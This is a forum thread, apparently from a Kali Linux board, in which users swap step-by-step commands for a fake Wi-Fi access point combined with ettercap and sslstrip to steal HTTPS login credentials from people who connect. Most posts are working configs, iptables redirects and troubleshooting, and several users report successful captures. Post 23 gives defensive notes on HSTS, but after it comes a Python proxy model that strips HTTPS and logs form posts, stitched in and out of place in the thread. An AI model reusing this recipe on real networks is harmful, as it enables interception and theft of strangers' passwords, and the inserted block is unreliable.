
Thread: Fake access point + ettercap + sslstrip

  1. #1
    Join Date
    2013-Mar
    Posts
    12

    Fake access point + ettercap + sslstrip

    Hi all

    I want to make a fake access point to sniff https passwords. I started the fake access point (airmon-ng), and did the iptables forwarding and dhcp configuration. Everything is good until now: clients get connected and can browse the internet, but when I start ettercap and sslstrip I can't get any https passwords. The client is still browsing, but no passwords at all. I tried many tutorials with different configurations but no way; it seems like there is something wrong with sslstrip.
    Anyway, here is my configuration:

    Code:
    wireless=wlan0
    internet=eth0

    airbase-ng -c 1 -e free-wifi mon0
    ifconfig at0 up &&
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 &&
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &&
    dhcpd

    iptables --flush && iptables --table nat --flush && iptables --delete-chain &&
    iptables --table nat --delete-chain &&
    iptables --append FORWARD --in-interface at0 -j ACCEPT &&
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE &&
    echo 1 > /proc/sys/net/ipv4/ip_forward &&
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1   # gateway on eth0

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    ettercap -Tqi at0 -M arp:remote // //
    sslstrip -akf


    The dhcpd configuration is correct because clients get connected and can browse the internet,
    but as I said, no https passwords.

    When I run sslstrip I get this:

    Code:
    sslstrip 0.9 by Moxie Marlinspike running...
    Unhandled error in Deferred:
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 250, in _checkTimeout
    userDeferred.callback(result)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 368, in callback
    self._startRunCallbacks(result)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 464, in _startRunCallbacks
    self._runCallbacks()
    --- <exception caught here> ---
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
    File "/usr/share/sslstrip/sslstrip/ClientRequest.py", line 115, in handleHostResolvedError
    self.finish()
    File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 866, in finish
    "Request.finish called on a request after its connection was lost; "
    exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.



    Can you tell me what I'm missing here?
    Thanks all.
    anas.
    Last edited by anashlali; 2013-07-07 at 20:19. Reason: update

  2. #2
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    gedit /etc/dhcpd.conf
    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################
    airmon-ng start wlan1 11
    airbase-ng -c 11 -e HOME mon0
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    ######################################################
    root@hk3r:~# sslstrip -f -p -k 10000
    ##########################################
    root@hk3r:~# ettercap -p -u -T -q -i at0
    ############################################

    On MY Kali it worked fine:
    http://imageshack.us/f/89/1ld1.png/
    Last edited by zimmaro; 2013-12-08 at 11:00.

  3. #3
    Join Date
    2013-Mar
    Posts
    3
    Quote Originally Posted by zimmaro
    gedit /etc/dhcpd.conf
    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################
    root@hk3r:~# airmon-ng start wlan1 11
    root@hk3r:~# ifconfig at0 10.0.0.1 netmask 255.255.255.0
    root@hk3r:~# ifconfig at0 mtu 1400
    root@hk3r:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    root@hk3r:~# iptables --flush
    root@hk3r:~# iptables --table nat --flush
    root@hk3r:~# iptables --delete-chain
    root@hk3r:~# iptables --table nat --delete-chain
    root@hk3r:~# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    root@hk3r:~# iptables -P FORWARD ACCEPT
    root@hk3r:~# iptables --append FORWARD --in-interface at0 -j ACCEPT
    root@hk3r:~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    root@hk3r:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    root@hk3r:~# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    root@hk3r:~# /etc/init.d/isc-dhcp-server start
    ######################################################
    root@hk3r:~# sslstrip -f -p -k 10000
    ##########################################
    root@hk3r:~# ettercap -p -u -T -q -i at0
    ############################################

    On MY Kali it worked fine:
    http://imageshack.us/f/89/1ld1.png/
    Thanks a lot zimmaro

    This is very interesting! Useful, simple and effective!

  4. #4
    Join Date
    2013-Mar
    Posts
    12
    @zimmaro

    Thanks man.
    I just reactivated forwarding again (echo 1 > /proc/sys/net/ipv4/ip_forward) and it's working with my configuration. I think ettercap needs -p -u to work without stopping IP forwarding, so I just reactivated it again.
    I'll test your configuration. Thanks again.

  5. #5
    Join Date
    2013-Apr
    Posts
    10
    Hello,

    Could you please post the complete steps of this setup with some explanation, or point me to some useful article?

    Thanks in advance.

  6. #6
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by graytips
    Hello,

    Could you please post the complete steps of this setup with some explanation or request you to point some useful article.

    Thanks in advance.
    hi
    I made a "video" of this a month ago on my Vimeo, if you want to take a look:
    http://vimeo.com/73069192


    PS: previously you need to install isc-dhcp-server

    bye
    Last edited by zimmaro; 2013-10-15 at 07:29.

  7. #7
    Join Date
    2013-Nov
    Posts
    68
    Help please,

    I got it to work but now I get errors with sslstrip:

    Code:
    sslstrip 0.9 by Moxie Marlinspike running...
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/bin/sslstrip", line 105, in main
    reactor.run()
    File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
    self.mainLoop()
    File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
    self.doIteration(t)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
    --- <exception caught here> ---
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
    Last edited by thepoor; 2013-11-13 at 18:42.

  8. #8
    Join Date
    2013-Nov
    Posts
    68
    Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

    Thanks for the fantastic tutorial.
    Last edited by thepoor; 2013-11-14 at 12:34.

  9. #9
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by thepoor
    Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

    Thanks for the fantastic tutorial.

    Thanks
    well, make no mistake, I still use the "pigeon-traveler"

  10. #10
    Join Date
    2013-Sep
    Posts
    14
    Will this also capture android devices on the network?
    Anybody any experience with it?

  11. #11
    Join Date
    2013-Nov
    Posts
    68
    Quote Originally Posted by Attilafx
    Will this also capture android devices on the network?
    Anybody any experience with it?
    I would say any device that uses a browser to access their email, bank, etc.

  12. #12
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Attilafx
    Will this also capture android devices on the network?
    Anybody any experience with it?
    I have no experience with this, and it is not always obvious (some browsers & providers are "intractable"), but on my Android (SlimSaber 4.3.1) it SEEMS to work in my little test:
    https://vimeo.com/79988268

    PS: sorry for the "very low" quality, but I'm clumsy at handling 2 video devices in sync

  13. #13
    Join Date
    2013-Jun
    Posts
    123
    Quote Originally Posted by zimmaro

    Thanks
    well, make no mistake, I still use the "pigeon-traveler"
    What is pigeon-traveler? Sounds interesting.

  14. #14
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by zimmaro
    ...
    option domain-name-servers 10.0.0.1;
    ...
    root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    ...
    I have two questions:
    1- In dhcpd.conf you have specified a DNS server. Is it configured on 192.168.1.1 and does the client use it?
    2- Is the rule "...PREROUTING -p udp -j DNAT..." used to permit DNS requests by the client?

    thank you very much

  15. #15
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by alfoc
    I have two questions:
    1- In dhcpd.conf you have specified a DNS server. Is it configured on 192.168.1.1 and does the client use it?
    2- Is the rule "...PREROUTING -p udp -j DNAT..." used to permit DNS requests by the client?

    thank you very much
    hi alfoc
    I'm not really able to give a correct technical answer (I'm a g0at-tester)
    I can try to explain it in MY ignorant way:
    I THINK that this "rule" is closely linked to the fact that the "victim" can browse
    It hangs on the PREROUTING chain (-A PREROUTING) of the NAT table (-t nat) a rule that all UDP packets (-p udp) are "updated" by changing the destination address (-j DNAT) to 192.168.1.1 (the router of my LAN connection for Kali)

    sorry for my "bad" replies && my bad English
    if someone more prepared than me can help you........&&..me
    bye
    Last edited by zimmaro; 2013-11-26 at 17:06.

  16. #16
    Join Date
    2013-Nov
    Posts
    2
    So from what I understood, the NAT of the "fake AP" works just like the NAT of a VM?

  17. #17
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by zimmaro
    I have no experience with this, and it is not always obvious (some browsers & providers are "intractable"), but on my Android (SlimSaber 4.3.1) it SEEMS to work in my little test:
    https://vimeo.com/79988268

    PS: sorry for the "very low" quality, but I'm clumsy at handling 2 video devices in sync
    OK, it works, but can you try again loading, for example, a Gmail account with the "Gmail app on Android"? Does it work?

  18. #18
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by alfoc
    OK, it works, but can you try again loading, for example, a Gmail account with the "Gmail app on Android"? Does it work?
    I made a fast test on my 4.3.1:
    confirmed it DOESN'T work with .apks with a pre-configured account (I refreshed & synchronized)
    gmail.apk >>> no sniff
    yahoo.apk >>> no sniff
    AquaMail.apk set up with multiple accounts >>> no sniff for hotmail... BUT it sniffed TWO "Italian mail providers"
    bye

  19. #19
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by zimmaro
    I made a fast test on my 4.3.1:
    confirmed it DOESN'T work with .apks with a pre-configured account (I refreshed & synchronized)
    gmail.apk >>> no sniff
    yahoo.apk >>> no sniff
    AquaMail.apk set up with multiple accounts >>> no sniff for hotmail... BUT it sniffed TWO "Italian mail providers"
    bye
    I agree, and no one says it!
    I think the Gmail/Facebook/Twitter apps work only with port 443, so sslstrip is useless for them.
    It's a big issue for a fake AP. Nowadays all users use applications on their smartphone to read email etc.

  20. #20
    Join Date
    2013-Mar
    Location
    Timor Leste
    Posts
    6
    Did the victim not receive any warning when you attack HTTPS? It seems that when the attack happens, it forces the victim to use HTTP. Thanks
    Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.

  21. #21
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Hi all,
    I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to eth0.
    I checked the routing rules and they seem to be OK.

    Do you have any idea?


    Code:
    root@kali-Cris:/home/cristian# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
    10.0.0.0        10.0.0.254      255.255.255.0   UG    0      0        0 at0
    10.0.0.0        *               255.255.255.0   U     0      0        0 at0
    192.168.255.0   *               255.255.255.0   U     0      0        0 eth0

    root@kali-Cris:/home/cristian# iptables -nvL
    Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
     pkts bytes target     prot opt in     out     source               destination         
     1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
        0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
    
    Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
     pkts bytes target     prot opt in     out     source               destination

  22. #22
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by Crix75ita
    Hi all,
    I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to eth0.
    I checked the routing rules and they seem to be OK.

    Do you have any idea?


    Code:
    root@kali-Cris:/home/cristian# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
    10.0.0.0        10.0.0.254      255.255.255.0   UG    0      0        0 at0
    10.0.0.0        *               255.255.255.0   U     0      0        0 at0
    192.168.255.0   *               255.255.255.0   U     0      0        0 eth0

    root@kali-Cris:/home/cristian# iptables -nvL
    Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
     pkts bytes target     prot opt in     out     source               destination         
     1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
        0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
    
    Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
     pkts bytes target     prot opt in     out     source               destination
    I guess your rules are incorrect. You should have the "eth0" interface in the FORWARD rules, not "at0". Like this:

    Chain FORWARD (policy ACCEPT 6434 packets, 740K bytes)
     pkts bytes target     prot opt in     out     source               destination
     7264 6007K ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0

    My rules:

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface eth0 -j ACCEPT
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

  23. #23
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by abraoximenes
    Did the victim not receive any warning when you attack HTTPS? It seems that when the attack happens, it forces the victim to use HTTP. Thanks
    Transparent for an "occasional" user. An "advanced" user might notice that the connection uses HTTP and not HTTPS.
    If the attacker uses sslstrip with the "-f" option, an advanced user might notice the unusual favicon.

    Notes: sslstrip doesn't work if

    - the client requests an address with HTTPS directly, for example HTTPS://www.example.com;
    - the web site supports HSTS, which forces a browser to interact with the server solely over HTTPS;
    - the client is a smartphone AND the user uses an app (apps like Gmail, Facebook etc. work only with HTTPS). I guess this is not so for all applications...

    * notes from http://blog.csnc.ch/tag/sslstrip/

    "The very initial request to a HSTS web site may still be http and thus exposed to a standard Man-In-The-Middle attack (Bootstrap MITM). In that phase, an attacker could tamper with the HSTS response header and inject invalid subdomains (DoS), disable HSTS (set max-age to 0) or poison the HSTS cache of the user agent otherwise. However, wrongly stored HSTS policies can be simply removed by clearing the local browser cache."

    * HSTS: "HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers." (https://www.owasp.org/index.php/HTTP...sport_Security)

    It is useful to install "HTTPS Everywhere", an extension for Firefox and Chrome (https://www.eff.org/https-everywhere).
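A working model of the points in the post above, added here as an example and not code from any post or from sslstrip itself. A small Python class plays the stripping proxy on the AP side (rewriting https:// links and Location headers to http:// and recording plaintext form posts) together with the client-side rules that decide whether a request ever reaches it in the clear: a URL typed or hard-coded as HTTPS, an app that only speaks port 443, and a cached HSTS policy all send the request over TLS, while a Strict-Transport-Security header received during a stripped plaintext session is ignored by the browser, which is the bootstrap gap the quoted csnc note describes. Host names, the exchange and the `hsts_cache` contents are constructed.

```python
"""Model of an SSL-stripping proxy and of the client-side conditions that defeat it.

Added example for this thread, not sslstrip's own code. The HTTP exchange,
host names and the hsts_cache contents are constructed.
"""
import re

# Absolute https:// links; the captured group is the host name.
HTTPS_LINK = re.compile(r"https://([A-Za-z0-9.-]+)")


def host_of(url):
    """Host part of an absolute URL (scheme and path stripped)."""
    return url.split("://", 1)[1].split("/", 1)[0]


class SslStripModel:
    def __init__(self, hsts_cache=()):
        # Hosts the victim's browser already holds an HSTS policy for (assumed client state).
        self.hsts_cache = set(hsts_cache)
        # Hosts whose https:// links this proxy rewrote; it fetches them over TLS upstream.
        self.stripped_hosts = set()
        # Plaintext form submissions seen on port 80 after stripping.
        self.captured_posts = []

    def client_sends(self, url):
        """Does this navigation leave the client as plaintext HTTP on port 80?

        Returns (strippable, reason). Only plaintext requests match the tcp/80
        REDIRECT and reach the proxy; a TLS session passes the AP opaque.
        """
        if url.startswith("https://"):
            return False, ("client requested HTTPS directly: typed URL, bookmark, "
                           "or an app that only speaks port 443")
        if host_of(url) in self.hsts_cache:
            return False, "browser holds an HSTS policy and upgrades to HTTPS before sending"
        return True, "plaintext request matches the tcp/80 REDIRECT and reaches the proxy"

    def strip_response(self, headers, body):
        """Rewrite an upstream HTTPS response into the plaintext copy the client gets.

        https:// in the body and in Location headers becomes http://; the host is
        remembered so later requests for it are fetched over TLS upstream.
        """
        def swap(match):
            self.stripped_hosts.add(match.group(1))
            return "http://" + match.group(1)

        out_headers = {k: (HTTPS_LINK.sub(swap, v) if k.lower() == "location" else v)
                       for k, v in headers.items()}
        return out_headers, HTTPS_LINK.sub(swap, body)

    def client_posts(self, url, form):
        """A form submission is captured only if it travels in the clear."""
        strippable, _ = self.client_sends(url)
        if strippable:
            self.captured_posts.append((url, dict(form)))
        return strippable

    def client_learns_hsts(self, host, headers, over_https):
        """Browser rule (RFC 6797): Strict-Transport-Security is honoured only over HTTPS.

        Even if the proxy forwards the header, it reaches the victim over plaintext
        and is ignored, so a stripped session never installs the policy; that is the
        bootstrap gap in the csnc note above.
        """
        if over_https and any(k.lower() == "strict-transport-security" for k in headers):
            self.hsts_cache.add(host)


if __name__ == "__main__":
    m = SslStripModel()
    print(m.client_sends("http://mail.example.com/"))
    hdrs, body = m.strip_response(
        {"Location": "https://mail.example.com/login",
         "Strict-Transport-Security": "max-age=31536000"},
        '<form action="https://mail.example.com/login" method="post">')
    print(hdrs["Location"], body)
    print(m.client_posts("http://mail.example.com/login", {"user": "alice", "pass": "hunter2"}))
    print(m.client_sends("https://mail.example.com/"))   # app pinned to 443: untouched
    m.client_learns_hsts("mail.example.com", hdrs, over_https=False)
    print(m.client_sends("http://mail.example.com/"))    # header over HTTP ignored: still stripped
    m.client_learns_hsts("mail.example.com", hdrs, over_https=True)
    print(m.client_sends("http://mail.example.com/"))    # policy cached: strip fails
```

Running it as a script walks through the four cases in order: a plaintext navigation gets stripped and the login post is captured, the same site opened as HTTPS (or by an app pinned to 443) passes untouched, the HSTS header delivered over the stripped session changes nothing, and a policy learned on a genuine HTTPS visit makes the next plaintext navigation upgrade before it leaves the client.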

  24. #24
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301

    Quote Originally Posted by Crix75ita
    Hi all,
    I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to eth0.
    I checked the routing rules and they seem to be OK.

    Do you have any idea?


    Code:
    root@kali-Cris:/home/cristian# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
    10.0.0.0        10.0.0.254      255.255.255.0   UG    0      0        0 at0
    10.0.0.0        *               255.255.255.0   U     0      0        0 at0
    192.168.255.0   *               255.255.255.0   U     0      0        0 eth0

    root@kali-Cris:/home/cristian# iptables -nvL
    Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
     pkts bytes target     prot opt in     out     source               destination         
     1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
        0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
    
    Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
     pkts bytes target     prot opt in     out     source               destination
    hi cris
    if this can help:
    in "my" route with "my" configuration I seem to have a "little-little-different" result in the last line (I think, but I'm not sure, that this is the reason)
    my example scenario:
    ATTACKER: kali 1.05 32-bit on vmplayer with alfa36nh (used the posted configuration for the fake AP), LAN eth0 connected (BRIDGE) to my Alice gateway
    VICTIM: notebook win7sp1 (FULLY patched && AV && firewall UP) connected to the fake AP (kali) via the internal Wi-Fi interface (it does NOT get a restricted-access message!!!), free web browsing to e.g. gmail & hotmail
    IP ATTACKER eth0 = 192.168.1.7
    IP victim Wi-Fi = 192.168.1.3
    IP ROUTER (alice) = 192.168.1.1
    http://imageshack.us/f/22/id9v.png/

    bye, sorry for my English!!
    @zoom 1600x1200
    Last edited by zimmaro; 2013-12-08 at 09:16.

  25. #25
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Thanks all for your support,
    I tried several times, but the Kali machine doesn't forward the packets from at0 to the internet on eth0.

    My scenario:
    Attacker Kali ETH0 192.168.255.11/24 gw 192.168.255.1 "the last address is my router to the internet"
    Attacker Kali AT0 192.168.5.1/24
    Victim WIFI 192.168.5.31 "the victim is connected to the fake AP and I can ping the Kali network 192.168.5.1"

    Sorry for my bad English
    thanks

    Cris

  26. #26
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Hi all,
    I did some tests and I saw that if I use the ping command from the victim to a public IP (example 8.8.8.8), the ping works, but if I try to ping a host by name (example google.it) it does not work, as if there were a problem with name resolution via iptables.
    I checked the network parameters set by DHCP and they are all correct: IP, gateway and DNS (for example I use 8.8.8.8 or 8.8.4.4 in dhcpd.conf).

    Do you have any idea?
    Thanks to all.

    Cris

  27. #27
    Join Date
    2013-Nov
    Posts
    68
    Crix,

    Can you post the steps that you did? It would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.

  28. #28
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Quote Originally Posted by thepoor
    Crix,

    Can you post the steps that you did? It would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.
    OK, I followed the same procedure as Zimmaro:

    1 - set the wireless card in monitor mode:
    Code:
    airmon-ng start wlan0 11
    
    Found 3 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID	Name
    2436	NetworkManager
    2531	wpa_supplicant
    2543	dhclient
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 3945ABG	iwl3945 - [phy0]
    				(monitor mode enabled on mon0)
    2 - start the fake access point :

    Code:
    root@kali-Cris:/home/cristian# airbase-ng -c 11 -e FAKE-IT mon0
    15:55:41  Created tap interface at0
    15:55:41  Trying to set MTU on at0 to 1500
    15:55:41  Trying to set MTU on mon0 to 1800
    15:55:41  Access Point with BSSID 00:1F:xx:xx:xx:xx started.
    3 - set the at0 interface
    Code:
    root@kali-Cris:/home/cristian# ifconfig at0
    at0       Link encap:Ethernet  HWaddr 00:1f:xx:xx:xx:xx 
              inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
              inet6 addr: fe80::21f:3cff:fe35:2930/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:500 
              RX bytes:0 (0.0 B)  TX bytes:468 (468.0 B)
    4 - set the route for network 192.168.5.0/24
    Code:
    root@kali-Cris:/home/cristian# route 
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
    192.168.5.0     192.168.5.1     255.255.255.0   UG    0      0        0 at0
    192.168.5.0     *               255.255.255.0   U     0      0        0 at0
    192.168.255.0   *               255.255.255.0   U     0      0        0 eth0
    5 - edit the dhcpd.conf
    Code:
    root@kali-Cris:/home/cristian# cat /etc/dhcpd.conf
    
    subnet 192.168.5.0 netmask 255.255.255.0 {
    authoritative;
    range 192.168.5.30 192.168.5.60;
    default-lease-time 700;
    max-lease-time 8000;
    option subnet-mask 255.255.255.0;
    option routers 192.168.5.1;
    option domain-name-servers 8.8.8.8;
    option broadcast-address 192.168.5.255;
    }
    6 - run dhcp service
    Code:
    root@kali-Cris:/home/cristian# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    Internet Systems Consortium DHCP Server 4.2.2
    Copyright 2004-2011 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Wrote 3 leases to leases file.
    Listening on LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
    Sending on   LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
    Sending on   Socket/fallback/fallback-net
    
    root@kali-Cris:/home/cristian# /etc/init.d/isc-dhcp-server start
    [ ok ] Starting ISC DHCP server: dhcpd.
    7 - set ip forwarding
    Code:
    root@kali-Cris:/home/cristian# echo 1 > /proc/sys/net/ipv4/ip_forward 
    root@kali-Cris:/home/cristian# cat /proc/sys/net/ipv4/ip_forward 
    1
    8 - clean iptables rules
    Code:
    root@kali-Cris:/home/cristian# iptables --flush
    root@kali-Cris:/home/cristian# iptables --table nat --flush
    root@kali-Cris:/home/cristian# iptables --delete-chain
    root@kali-Cris:/home/cristian# iptables --table nat --delete-chain
    9 - Verify the rules
    Code:
    root@kali-Cris:/home/cristian# iptables-save > /home/cristian/Start.rules
    root@kali-Cris:/home/cristian# cat /home/cristian/Start.rules 
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
    *nat
    :PREROUTING ACCEPT [44:4885]
    :INPUT ACCEPT [44:4885]
    :OUTPUT ACCEPT [8:474]
    :POSTROUTING ACCEPT [8:474]
    COMMIT
    # Completed on Tue Dec 10 16:11:40 2013
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
    *filter
    :INPUT ACCEPT [184:27160]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [67:19370]
    COMMIT
    # Completed on Tue Dec 10 16:11:40 2013
    10 - set new rules
    Code:
    root@kali-Cris:/home/cristian# iptables --append FORWARD --in-interface at0 -j ACCEPT
    root@kali-Cris:/home/cristian# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    root@kali-Cris:/home/cristian# iptables -P FORWARD ACCEPT
    root@kali-Cris:/home/cristian# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.255.1
    11 - verify
    Code:
    root@kali-Cris:/home/cristian# iptables-save > /home/cristian/New.rules
    root@kali-Cris:/home/cristian# cat /home/cristian/New.rules 
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
    *nat
    :PREROUTING ACCEPT [5:208]
    :INPUT ACCEPT [5:208]
    :OUTPUT ACCEPT [0:0]
    :POSTROUTING ACCEPT [0:0]
    -A PREROUTING -p udp -j DNAT --to-destination 192.168.255.1
    -A POSTROUTING -o eth0 -j MASQUERADE
    COMMIT
    # Completed on Tue Dec 10 16:15:17 2013
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
    *filter
    :INPUT ACCEPT [21:2049]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [9:392]
    -A FORWARD -i at0 -j ACCEPT
    COMMIT
    # Completed on Tue Dec 10 16:15:17 2013
    OK, in this situation I can ping a public address on the internet from the victim's PC on the FAKE AP, but the victim's PC doesn't resolve host names.

    Test from the victim's PC:
    Code:
    ^CMacBook-Pro-di-Cristian:~ Cristian$ ping 8.8.8.8
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    64 bytes from 8.8.8.8: icmp_seq=0 ttl=49 time=48.580 ms
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=49 time=77.322 ms
    64 bytes from 8.8.8.8: icmp_seq=2 ttl=49 time=61.213 ms
    Request timeout for icmp_seq 3
    64 bytes from 8.8.8.8: icmp_seq=4 ttl=49 time=74.385 ms
    64 bytes from 8.8.8.8: icmp_seq=5 ttl=49 time=73.112 ms
    64 bytes from 8.8.8.8: icmp_seq=6 ttl=49 time=73.091 ms
    64 bytes from 8.8.8.8: icmp_seq=7 ttl=49 time=72.951 ms
    64 bytes from 8.8.8.8: icmp_seq=8 ttl=49 time=107.321 ms
    64 bytes from 8.8.8.8: icmp_seq=9 ttl=49 time=61.472 ms
